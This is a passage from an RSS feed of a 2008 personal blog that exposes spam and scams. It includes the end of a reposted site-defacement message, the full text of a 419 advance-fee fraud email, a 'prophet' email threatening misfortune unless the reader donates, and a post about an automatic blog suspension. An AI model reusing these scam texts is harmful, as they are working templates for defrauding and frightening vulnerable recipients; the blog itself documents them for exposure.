<li><strong><span style="font-size: x-small;">following their atrocities in Afghanistan and Iraq and foreboding the same in Syria and Iran,</span></strong></li>
<li><strong><span style="font-size: x-small;">sinking into utter barbarity in transgression of all universal norms of human morality.</span></strong></li>
</ul>
</td>
</tr>
<tr>
<td width="79%" height="40" align="left">
<p align="center"><span style="font-size: x-small;"><strong>The Following Are Also Responsible:</strong></span></p>
</td>
</tr>
<tr>
<td width="79%" height="190" align="left">
<ul>
<li><span style="font-size: x-small;"><strong>All government employees and agents, advisors, </strong></span><strong><span style="font-size: x-small;">civil and military functionaries who partake in collective and individual responsibility in these states;</span></strong></li>
<li><strong><span style="font-size: x-small;">the legislative and judicial branches that have not curbed the criminal activities of their governments as they violate basic human rights, most significantly the right to live, and as they trample international legal norms and commit crimes against humanity;</span></strong></li>
<li><strong><span style="font-size: x-small;">universities, media, intellectuals, workers and citizens who do not restrain and sanction their governments through domestic democratic channels;</span></strong></li>
<li><strong><span style="font-size: x-small;">UNITED NATIONS and other national and international bodies that actively or passively support, aid and abet this illegality, crude force, and aggression –all bear responsibility for the catastrophe that is taking place.</span></strong></li>
</ul>
</td>
</tr>
<tr>
<td width="79%" height="34" align="left">
<p align="center"><span style="font-size: x-small;"><strong>We Demand:</strong></span></p>
</td>
</tr>
<tr>
<td width="79%" height="152" align="left">
<ul>
<li><span style="font-size: x-small;"><strong>An immediate cessation of this horror,</strong></span></li>
<li><strong><span style="font-size: x-small;">the due trial, in international tribunals, as well as in the courts of conscience and history,</span></strong></li>
<li><strong><span style="font-size: x-small;">of, above all, Bush, Blair, and Olmert as perpetrators of crimes against humanity,</span></strong></li>
<li><strong><span style="font-size: x-small;">of their respective government agents and supporters,</span></strong></li>
<li><strong><span style="font-size: x-small;">of the chief executives and state personnel in all countries that have been accomplices to these crimes against humanity,</span></strong></li>
<li><strong><span style="font-size: x-small;">and their removal from office by the lawful and democratic initiatives of their respective citizenry.</span></strong></li>
</ul>
</td>
</tr>
<tr>
<td width="79%" height="40">
<p align="center"><span style="font-size: x-small;"><strong>And We Declare:</strong></span></p>
</td>
</tr>
<tr>
<td width="79%" height="152">
<ul>
<li>
<p align="left"><em><span style="font-size: x-small;"><strong>We stand at a critical juncture in human history.</strong></span></em></p>
</li>
<li>
<p align="left"><strong><em><span style="font-size: x-small;">These aggressive, colonialist, exploitative, and militarist practices are negating the achievements of humanity, destroying the basic pillars of international law, and thus, threatening the present and the future of this planet.</span></em></strong></p>
</li>
<li>
<p align="left"><strong><em><span style="font-size: x-small;">We refuse to submit to this brutal force and be accomplices to its crimes.</span></em></strong></p>
</li>
<li>
<p align="left"><strong><em><span style="font-size: x-small;">We refuse to give in to the (il)logic of blood-fed economies and lethal war machines.</span></em></strong></p>
</li>
<li>
<p align="left"><strong><em><span style="font-size: x-small;">We declare that we will continue to struggle for a different world.</span></em></strong></p>
</li>
</ul>
</td>
</tr>
</tbody>
</table>
</div>
<p></strong> </p>
<hr />
<p align="center"><span style="font-family: 'Courier New'; font-size: x-small;"><strong></strong></span></p>
<p align="center"><strong><span style="font-family: 'Courier New'; font-size: small;">www.Ateskes.Org</span></strong></p>
<p align="center"><strong><span style="font-family: 'Courier New'; font-size: x-large;">King Defacer</span></strong></p>
<p> </p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2008/12/hacked-by-guard_fb-wordpress-dashboard-attack/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fed Sibaya &#8211; Unusual 419 Comes With Word Doc</title>
		<link>http://andrewapeterson.com/2008/11/fed-sibaya-unusual-419-comes-with-word-doc/</link>
		<comments>http://andrewapeterson.com/2008/11/fed-sibaya-unusual-419-comes-with-word-doc/#comments</comments>
		<pubDate>Fri, 07 Nov 2008 09:51:18 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Scam Email Mashups]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=1536</guid>
		<description><![CDATA[From:MR FRED SIBAYA  No.54 Palm Groove, Braafontein  Johannesburg South Africa  Tel/Fax+0027 86 529 0021     Dear Sir,  I am MR.FRED SIBAYA from Zimbabwe the first Son of MR JOHN SIBAYA, who was murdered in the land dispute in Zimbabwe by the agents of the ruling government of President ROBERT MUGABE, you must have heard his [...]]]></description>
			<content:encoded><![CDATA[<p>From:MR FRED SIBAYA <br />
No.54 Palm Groove,</p>
<p>Braafontein </p>
<p>Johannesburg</p>
<p>South Africa <br />
Tel/Fax+0027 86 529 0021 </p>
<p><a href="http://images.google.com/images?hl=en&amp;client=safari&amp;rls=en-au&amp;resnum=0&amp;q=Braamfontein%20Johannesburg%20South%20Africa&amp;um=1&amp;ie=UTF-8&amp;sa=N&amp;tab=wi"><img class="alignnone size-full wp-image-1540" title="picture-12" src="http://andrewapeterson.com/wp-content/uploads/2008/11/picture-12.png" alt="" width="499" height="332" /></a><br />
  <br />
Dear Sir, </p>
<p>I am MR.FRED SIBAYA from Zimbabwe the first Son of MR JOHN SIBAYA, who was murdered in the land dispute in Zimbabwe by the agents of the ruling government of President ROBERT MUGABE, you must have heard his alleged support and sympathy for the opposition MDC PARTY led by the minority white farmers.  My Father was among the few black Zimbabwean rich farmers murdered in cold blood by the war veterans backed by the government.  <span> </span></p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=MDC+PARTY&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-1541" title="picture-13" src="http://andrewapeterson.com/wp-content/uploads/2008/11/picture-13.png" alt="" width="319" height="269" /></a></p>
<p>Before the death of my Father, he deposited the sum of US$12M (Twelve Million United State Dollars) With one of the security company in Southern Africa, as if he knew the looming danger in ZIMBABWE. The money was deposited as a gem and precious stones to avoid much attraction  from the security firm. The money was earmarked for the purchase of new machinery and chemicals for the farms and the establishment of new farms in Lesotho and Swaziland before the regretted incident.  This Land problem arose when President Robert Mugabe introduced a new land act. Which wholly affects the white rich farmers and some few blacks vehemently condemned the &#8220;Modus operandi&#8221; adopted by the government.  This resulted to rampart killing and Mob actions.  <span> </span></p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=President+Robert+Mugabe&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-1542" title="picture-14" src="http://andrewapeterson.com/wp-content/uploads/2008/11/picture-14.png" alt="" width="500" height="407" /></a></p>
<p>My mother and I are staying in South Africa now as Asylum seekers, which have not been beneficial to us; I have decided to transfer this money to a foreign country where we can invest it. I am faced with the dilemma of investing this amount of money in South Africa for fear of encountering the same experience in future since both countries have the same political policy and also law does not permit us to investment hence we’re refugees.  I must let you know that this business is 100% risk free. I and my family have agreed to give you 20% of the total US12M, 5% will be mapped out for all expenses that maybe incurred during the transfer 5% for any charity organization and 70% will be for me and my family’s investment in your country. </p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=Asylum+seekers&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-1543" title="picture-16" src="http://andrewapeterson.com/wp-content/uploads/2008/11/picture-16.png" alt="" width="470" height="340" /></a></p>
<p>Therefore if you are willing and interested to render the needed assistance, endeavour to reply through  <span> HYPERLINK &#8220;mailto:fredsibaya0@gmail.com&#8221; \t &#8220;_blank&#8221; </span><span>fredsibaya0@gmail.com</span> for more brief clarifications. I also need your private mobile, telephone and fax numbers for easy communication. Remember; this is highly confidential and the success of this business depends on how secret it is kept. Expecting your reply soonest. </p>
<p> <br />
Best regards, </p>
<p> <br />
MR.FRED SIBAYA (FOR THE FAMILY)</p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=MR.FRED+SIBAYA&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-1544" title="picture-17" src="http://andrewapeterson.com/wp-content/uploads/2008/11/picture-17.png" alt="" width="431" height="161" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2008/11/fed-sibaya-unusual-419-comes-with-word-doc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>(spam) Prophet David Johnson! This one is interesting</title>
		<link>http://andrewapeterson.com/2008/10/prophet-david-johnson-spam/</link>
		<comments>http://andrewapeterson.com/2008/10/prophet-david-johnson-spam/#comments</comments>
		<pubDate>Mon, 06 Oct 2008 19:12:04 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Scam Email Mashups]]></category>
		<category><![CDATA[Spam and Scams]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=846</guid>
		<description><![CDATA[I find this one interesting because it doesn&#8217;t actually promise any money.  Instead it offers an opportunity to help build a church in Africa, and accuses the reader of needing redemption, being a sinner (who isn&#8217;t, right?) etc&#8230; From: david@teceng.net I am Prophet David Johnson, I went for a prayer mission in HAITI and the Lord [...]]]></description>
			<content:encoded><![CDATA[<p><em>I find this one interesting because it doesn&#8217;t actually promise any money.  Instead it offers an opportunity to help build a church in Africa, and accuses the reader of needing redemption, being a sinner (who isn&#8217;t, right?) etc&#8230;</em></p>
<p>From: david@teceng.net</p>
<p>I am Prophet David Johnson, I went for a prayer mission in HAITI and the Lord revealed so many things about you to me.</p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=prophet+david+johnson&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-847" title="picture-58" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-58.png" alt="" width="287" height="361" /></a></p>
<p>I see things and I reveal to people, something terrible which I have seen will happen to you, I just have to tell you, you will lose two important people you love very much, and evil will visit you personally, troubles and problems will leave with you, the things you never never believe that can happen to you, will happen. It has been dated when it will start very soon, sooner than you think.</p>
<p>The Lord reveal everything to me, and your email address appeared to me, after reading this message, if you believe me keep this message for your self alone do not share it with anybody, but if you don’t believe me delete this message and talk to your family, friends and relatives, tell them about the message so when things start happening to you, they will be informed, everything that will happen to you is spiritual, nobody will understand, when you even tell people what is happening to you they will never believe and understand because it is spiritual.</p>
<p>I have warned you now, we can prevent all this, but only if you believe God, but if you don’t believe God, wait and see what will happen.<br />
<a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=don’t+believe+God%2C+wait+and+see+what+will+happen&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-848" title="picture-59" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-59.png" alt="" width="400" height="255" /></a><br />
Lord has done so much for you, that you have failed to recognize and you have been cheating God, at this time your email address was revealed to me three times, that’s why I am contacting you, do not think this is a joke or just an email because I know what will be going on in your mind, you are free to believe and disbelief this message, but when evil starts happening there is no going back, I warn you it has been destined and dated, it will start sooner than you think.</p>
<p>As you are reading this message I still see doubt in you, but I will stop here. If you want to prevent all this evil that will hit you soon, I will know and I will tell you what to do.</p>
<p>God reveal to me that you have a lot of doubt in your mind that you will doubt this message.</p>
<p>The reason for writing this message, is because of the strong challenge which you must have to follow to prevent all this evil which will surround you sooner, you will not see them and you can never see them, because it is spiritual, when it starts it cannot stop, it will be as if God has giving you to Satan.</p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=satan&amp;btnG=Search+Images"><img class="alignnone size-full wp-image-849" title="picture-60" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-60.png" alt="" width="450" height="339" /></a></p>
<p>Look this is not a joke, this is what I have seeing and the only prevention is for you not to doubt and do what I will tell you to do, for your soul to be covered in God’s harms. We have to take you back from the Satan if you are ready to follow God’s instructions I will tell you what to do.</p>
<p>I can still see even as I’m writing this message that there is plenty of doubt inside your heart and mind, but you can over power your doubt, only if the evil leaving in your heart will allow you, it will be very difficult for you to do what God’s want you to do, but you can do it only if you put doubt aside.</p>
<p>God told me that we will win you back, but it will be difficult because your heart has been eating by doubt, my only advice to you to remove doubt and keep this message to you self, if you don’t take my advice wait and see. This is the only way out for you to avoid this evil, you have to sow a seed in the house of the Lord, there is a church we are building in Africa, and we want you to sow a seed in contributing on that church where your name will be writing as one of the people that contributed to stand the house of the Lord where people will enter everyday and pray for you who contributed to put up the structure.</p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=church+we+are+building+in+Africa&amp;btnG=Search+Images"><img class="alignnone size-medium wp-image-850" title="picture-63" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-63.png?w=300" alt="" width="300" height="225" /></a></p>
<div id="attachment_851" class="wp-caption alignnone" style="width: 273px"><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=congregation+to+pray+for+you&amp;btnG=Search+Images"><img class="size-medium wp-image-851" title="picture-64" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-64.png?w=263" alt="" width="263" height="300" /></a><p class="wp-caption-text">I was notified by &quot;L Matlow&quot; or &quot;E.Morgan, Copyright Compliance&quot; or, more likely, Linda Matlow, the photographer (pretending to be a lawyer), with a copyright infringement notice for this image, so I erased it. The link on the broken image still works, so feel free to look at the google results to get an idea of what might have been here.</p></div>
<p>The only way out of this predicament is you must have to contribute for the building of the church, your name must be writing in the church as one of the sponsors that is where your name will be written in the book of life, the book of joy and the book of happiness things will now turn around, when the church is completed everyday service your name will be announced for the church congregation to pray for you.</p>
<p>So you have to sow that seed that is the only message that will take you out of this evil, you name must be writing in that church before it is completed. There’s no way back we will beg you to do this because this is the only way for the evil to turn around, I’m a prophet I don’t talk too much. But if you fail to do what you have been told now, when the predicament start even if you give all you have to the church at that time it will not work, I am warning and begging don’t ignore this message.</p>
<p>The church will go on 40 days fasting for you starting from the day you sow a seed for the building of the church. Contact Pastor Emmanuel Anderson, tell Pastor Anderson that you want to contribute for the building of the new church, do not tell him about what I told you, just tell him you want to contribute then ask him how you can sow a seed, do this as quick as possible, nothing is too small and nothing is too big for the Lord do not cheat God again, do this I have told you.</p>
<p><a href="http://images.google.com/images?um=1&amp;hl=en&amp;client=safari&amp;rls=en-au&amp;q=Pastor+Emmanuel+Anderson&amp;btnG=Search+Images"><img class="alignnone size-medium wp-image-853" title="picture-65" src="http://andrewapeterson.com/wp-content/uploads/2008/10/picture-65.png?w=300" alt="" width="300" height="221" /></a></p>
<p>Give what you have never giving before, give what you feel your heart tells you, remember nothing  is too small and nothing is too big for the Lord, contact Pastor Emmanuel Anderson on this e-mail (pastoranderson@faithconvenantministry.co.cc) and tell him you want to sow a seed, after you have done that, then wait and see how blessing will rain upon your life each day, how you will swim in the rivers of success and joy.</p>
<p>I have given you the information and message which I was asked to give you, so now it is now left for you to believe it and do what you where told or forget it. I will never write you again or reply you, I have told you what I have to tell you, after reading this message you only have two things to do, either you follow the message or not.</p>
<p>I wish you the best in life.</p>
<p>Have a blessed day.</p>
<p>Regards,</p>
<p>Prophet David Johnson.</p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2008/10/prophet-david-johnson-spam/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>WordPress Blog Deleted/Archived for TOS Violation</title>
		<link>http://andrewapeterson.com/2008/09/this-blog-has-been-archived-suspended-violation-terms-service-wordpress/</link>
		<comments>http://andrewapeterson.com/2008/09/this-blog-has-been-archived-suspended-violation-terms-service-wordpress/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 20:41:20 +0000</pubDate>
		<dc:creator>andrewapeterson</dc:creator>
				<category><![CDATA[Computer Problems and Fixes]]></category>
		<category><![CDATA[Evil Robots]]></category>
		<category><![CDATA[Ideas, Observations, Opinions, Rants Etc]]></category>
		<category><![CDATA[SEO, SEM, SMO Etc]]></category>
		<category><![CDATA[Spam and Scams]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://andrewapeterson.com/?p=834</guid>
		<description><![CDATA[If your blog has been deleted suddenly by WordPress.com, DON&#8217;T PANIC!  &#8230;that is, unless you use your blog for phishing scams or spam-commenting or anything else that brings down the experience of other people on the Web and/or makes it harder for people to find the information they need.  In that case, panic.  Scream and cry. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>If your blog has been deleted suddenly by WordPress.com, DON&#8217;T PANIC!</strong>  &#8230;that is, unless you use your blog for phishing scams or spam-commenting or anything else that brings down the experience of other people on the Web and/or makes it harder for people to find the information they need.  In that case, panic.  Scream and cry.  I hope your blog is permanently deleted, and everything you eat for the rest of you life tastes horrible. The Web is our garden!  </p>
<p><strong>Assuming you are an ethical participant of <a href="http://en.wikipedia.org/wiki/Cloud_computing">The Cloud</a>, pretty soon you should get an email from WordPress.com explaining the nature of the take-down.</strong></p>
<p>[Anyway, my blog is back, obviously.  I guess I need to start backing up my blog? Jeeez.  What a hassle.]</p>
<p>[begin story]</p>
<p>I regularly blog about <a href="http://andrewapeterson.com/category/spam-and-scams/">scams/spam on the Web</a>.  It&#8217;s a way for me be discovered by, and to provide guidance to, people who happen to be googling around about some questionable content they find or are emailed.</p>
<p>One example of this is this <a href="http://www.google.com/search?hl=en&amp;client=safari&amp;rls=en-au&amp;q=paypal-cgi.com&amp;btnG=Search">search result for &#8220;paypal-cgi.com,</a>&#8221; a site that mimics PayPal in order to trick people into handing over their paypal login info.  I come up number one for the search, and the title of the result makes it clear that you shouln&#8217;t trust PayPal-CGI.com&#8230; If you click thru to my post, I explain why these things exist and how to detect this kind of crap.</p>
<p><img class="alignnone size-full wp-image-836" title="picture-41" src="http://andrewapeterson.com/wp-content/uploads/2008/09/picture-41.png" alt="" width="450" height="367" /></p>
<p>You see, I&#8217;m actually doing something good here.  And it&#8217;s good for me too.</p>
<p>Anyway, recently I encountered some scam crap on craigslist and blogged about it. And since my blog post contained a link to the spam/scam site I was exposing, WordPress.com&#8217;s evil-detectors went ape shit and my blog got automatically removed by wordpress.com.  </p>
<p>I was in the middle editing a post and suddenly my category selection buttons stopped working.  And there was a thing saying somethin like &#8220;you do not have permission to edit this..&#8221; or something like that.  When I refreshed the page, I got <strong>&#8220;The authors have deleted this blog. The content is no longer available&#8221;</strong></p>
<p><img class="alignnone size-full wp-image-837" title="picture-39" src="http://andrewapeterson.com/wp-content/uploads/2008/09/picture-39.png" alt="" width="450" height="308" /></p>
<p>&#8230;and my blog had been completely removed leaving only this scary screen saying: <strong>&#8220;This blog has been archived or suspended for a violation of our Terms of Service.&#8221;</strong></p>
<p><img class="alignnone size-full wp-image-838" title="picture-40" src="http://andrewapeterson.com/wp-content/uploads/2008/09/picture-40.png" alt="" width="450" height="333" /></p>
<p>Ironic. I got banned for merely exposing something malicious.</p>
<p>Current Spam-Filter technology isn&#8217;t context-aware. This is a slippery slope: Using words or links alone, without regard to context, to define what is untrustworthy content.</p>
<p>See the post in question for yourself <a href="http://andrewapeterson.com/2008/04/21/pyramid-schemes-gifting-programs-phil-in-new-mexico-craigslist-etc/">HERE</a>: </p>
<p>Fortunately, about an hour later, I got a message from WordPress.com: </p>
<blockquote><p>from: Anthony &#8211; WordPress.com:</p>
<p>Hi,</p>
<p>Your blog was automatically flagged, as links to overnightcashexplosion.com were detected (and these are certainly not permitted). The blog is back &#8211; please remove all such links.</p>
<p>Best,</p>
<p>Anthony</p>
<p>Automattic | WordPress.com</p></blockquote>
<p>I responded with:</p>
<blockquote><p>if it&#8217;s a url in text, is that different in the eyes of your spam defenses from an actual link?  I&#8217;d like to leave the url if possible so I can still come up in searches for that url. </p>
<p>WHat&#8217;s your take on that?</p>
<p>Thanks for communicating with me. <img src='http://andrewapeterson.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>-A</p></blockquote>
<p>Anthony from WordPress replied:</p>
<blockquote><p>Hi,<br />
Sure, you can leave it &#8211; I understand the context.</p>
<p>Best,<br />
Anthony<br />
Automattic | WordPress.com</p></blockquote>
<p>So, there is a layer of discretion here?  That&#8217;s good I guess.</p>
]]></content:encoded>
			<wfw:commentRss>http://andrewapeterson.com/2008/09/this-blog-has-been-archived-suspended-violation-terms-service-wordpress/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
	</channel>
</rss>

